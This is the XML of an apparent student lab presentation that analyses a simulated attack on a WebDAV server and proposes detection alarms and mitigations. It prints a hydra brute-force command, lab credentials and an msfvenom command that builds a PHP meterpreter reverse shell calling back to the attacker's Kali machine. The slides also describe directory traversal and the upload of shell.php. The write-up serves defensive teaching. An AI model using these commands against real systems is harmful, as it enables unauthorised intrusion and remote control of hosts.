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D9BE4C-B3AA-4B7D-8D69-55FF9AB47856}">
  <a:tblStyle styleId="{58D9BE4C-B3AA-4B7D-8D69-55FF9AB478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port scan occurred at 16:53:00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packets were sent from 192.169.1.90 (Kali Box)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screenshot resolution is not great but if you look closely you can identify this as a Port Scan. Within the screenshot the ports 443 &amp; 8080 were scanned. The time discrepancy between the scanned ports is within milliseconds so that is why the timestamp is the same as well.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bottom screenshot is showing the initial request to the webdav server. The screenshot above is where it is showing what is within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requests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were made to this server. The field(s) requested and what was shown were passwd.dav and shell.php once it was loaded onto this server.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Shell Payload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29750" y="1526475"/>
            <a:ext cx="2027700" cy="3108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58250" y="1576350"/>
            <a:ext cx="19992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tool msfvenom &amp; msfconsole were used to gain access. A custom payload was made to target the ‘reverse_tcp’ remote shell vulnerability on the victim host.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6" y="902115"/>
            <a:ext cx="533372" cy="520017"/>
            <a:chOff x="-60662" y="1415884"/>
            <a:chExt cx="695400" cy="677900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-60662" y="141588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75079" y="1905159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2104031" y="895390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104063" y="1526475"/>
            <a:ext cx="1952100" cy="3108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088175" y="1553325"/>
            <a:ext cx="19992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granted a meterpreter session on the victims machine; once the command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shell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was used that created a root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100" y="1468913"/>
            <a:ext cx="4857876" cy="34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2" name="Google Shape;116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occurred at 16:53:00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675976"/>
            <a:ext cx="9168601" cy="43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1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737400" y="-17410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2" name="Google Shape;117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/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="7004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for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>the hidden folder happened at 17:18:25. Only one request was made because it needs account credentials.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files requested were within the hidden directory /secret_folder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7004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1508825"/>
            <a:ext cx="9061842" cy="294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269825" y="786925"/>
            <a:ext cx="3882000" cy="1869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amount of requests that were made before the attacker discovered the password was 10,143.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25" y="675975"/>
            <a:ext cx="4308551" cy="43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75" y="3508550"/>
            <a:ext cx="5660275" cy="89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75" y="683009"/>
            <a:ext cx="5660276" cy="2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9" name="Google Shape;119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5" name="Google Shape;120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-An alarm can be made in regard to the amount of Syn packets being received within a given amount of time. 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-The threshold of more than 5 Syn packets within a 5 seconds margin.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;120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-Blocking all incoming traffic except for specific ports being used on said host.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-Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>firewalld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>services on Linux machines.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3" name="Google Shape;121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Look for ‘query: GET /company_folders/secret_folder’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-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>Any packet with that index match will set the alarm off.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Mitigation could be to apply input validation code logic or limiting user input when calling for system files.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1" name="Google Shape;122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Looking for ‘An account has failed to login’ or ‘status: error’ or ‘An attempt to login to this account has been made’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i="1" lang="en" sz="1400"/>
              <a:t>The threshold of more than 5 of the messages above within a 2 second period would warrant activation.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3" name="Google Shape;1223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-Configure the Password Policy (strong password, account lockout after X attempts, etc) for the network as well as 2FA.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9" name="Google Shape;122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An alarm that looks for ‘query: OPTIONS /webdav’ or ‘server.ip: 192.168.1.105’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-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>The threshold would be if these indexes above are reported in a packet in general.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1" name="Google Shape;1231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There is already password protection to gain access which is good unless someone cracked a user password. Having possible IP restrictions so only specific IP addresses can have access to the WebDAV server.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7" name="Google Shape;123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-Possibly using ‘network.transport: tcp’ , ‘network.direction: inbound’ , and ‘query: PROPFIND /webdav/*’. These indexes could be used as indicators for file uploads.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-</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1400"/>
              <a:t>The threshold would be if all these are met at the same time an alert will be triggered. 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9" name="Google Shape;123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i="1" lang="en" sz="1400"/>
              <a:t>Using strict Host-Based firewall rules for inbound packets. Have the HIPS also be used to prevent any file uploads as well. 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63700" y="910463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XP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18.04.4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No match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2.6.X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0" y="664925"/>
            <a:ext cx="4693925" cy="42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{58D9BE4C-B3AA-4B7D-8D69-55FF9AB47856}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Host that has the web server on it.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VM has an ELK stack on it. It has used docker containers to fulfill that task. Pulls varying log data to be analyzed.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Playing the role of attacker.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VM is where the 3 VM’s above are mounted on.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-44425" y="5723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100"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330225" y="8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{58D9BE4C-B3AA-4B7D-8D69-55FF9AB47856}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2729525"/>
                <a:gridCol w="2729525"/>
                <a:gridCol w="2729525"/>
              </a:tblGrid>
              <a:tr h="38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8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(CWE-307: Improper Restriction of Excessive Authentication Attempts)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unlimited amount of login attempts can be enacted on a user account.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victims password will eventually be cracked and this will give the attacker access to the host computer.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Traversal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Dir. Trav. allows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attacker to move through the directories of a website via the url link.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go where he/she shouldn’t; possibly seeing PII or company secrets.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php/meterpreter/reverse_tcp payload makes use of this vulnerability to allow a reverse shell to be established once the .php file is opened by the victim.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creating a reverse shell to get inside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’ machine giving them full-access.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server was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remotely and files were able to be uploaded to the victims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 payloads can be uploaded onto the victims computer to be used to grant a reverse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WebDAV Connection/File Upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1089" name="Google Shape;108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724200" y="1480575"/>
            <a:ext cx="2472900" cy="330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receiving credentials from the brute force attack the /secret_folder was accessed. This gave us the information on how to access the WebDAV server; as well as the credentials needed to do so. A remote connection was established with the WebDAV server and ‘shell.php’ was uploaded onto the server. Once the victim clicked on it, the reverse shell would be enacted.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the connection to the webdav server of the company. A malicious file was uploaded to the victims to lie in wait. Once the payload was opened a reverse shell was created between the Kali box and Server1. A root shell can be achieved once in the meterpreter session on the victims PC.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Connecting to WebDav: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dav://192.168.1.105/webdav/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Credentials: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Ryan/linux4u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Payload command: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</a:rPr>
              <a:t>msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=4444 &gt; shell.php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Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;111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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="1795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724275" y="1480625"/>
            <a:ext cx="2371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vulnerability was exploited using the hydra command; targeted at 192.168.1.105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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3495925" y="1480575"/>
            <a:ext cx="2547000" cy="1795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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428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Being able to access the /secret_folder directory. This provided the hashed password for Ryans account which was cracked to gain access to his account.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62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401075" y="1481325"/>
            <a:ext cx="2371500" cy="1795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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481374"/>
            <a:ext cx="23715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 below.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Command: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hydra -l ashton -P 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" name="Google Shape;11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500" y="3335250"/>
            <a:ext cx="6842551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